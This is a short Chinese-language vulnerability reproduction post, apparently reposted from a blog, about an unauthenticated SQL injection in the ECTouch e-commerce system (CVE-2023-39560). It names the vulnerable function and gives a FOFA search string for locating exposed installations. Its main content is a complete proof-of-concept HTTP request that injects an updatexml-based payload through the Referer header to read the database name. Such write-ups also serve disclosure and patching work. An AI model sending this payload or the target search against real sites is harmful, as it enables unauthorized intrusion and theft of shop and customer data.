ECTouch 电商微信小程序 SQL注入漏洞复现(CVE-2023-39560)

发布时间:2024年01月20日

0x01 产品简介

ECTouch是一款开源的电商系统,为中小企业提供最佳的新零售解决方案

0x02 漏洞概述

ECTouch 电商系统 /ectouch-main/include/apps/default/helpers/insert.php 文件中第285行的 insert_bought_notes 函数中,传入的 $arr['id'] 参数未进行验证和过滤,导致未经身份验证的攻击者利用该漏洞进行SQL 注入,获取数据库敏感信息。

0x03 复现环境

FOFA:"themes/default/statics/css/ectouch.css"

0x04 漏洞复现

PoC

GET /index.php?m=default&c=user&a=register&u=0 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Referer: 554fcae493e564ee0dc75bdf2ebf94cabought_notes|a:1:{s:2:"id";s:49:"0&&updatexml(1,concat(0x7e,(database()),0x7e),1)#";}

查询当前数据库

文章来源:https://blog.csdn.net/qq_41904294/article/details/135707912
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。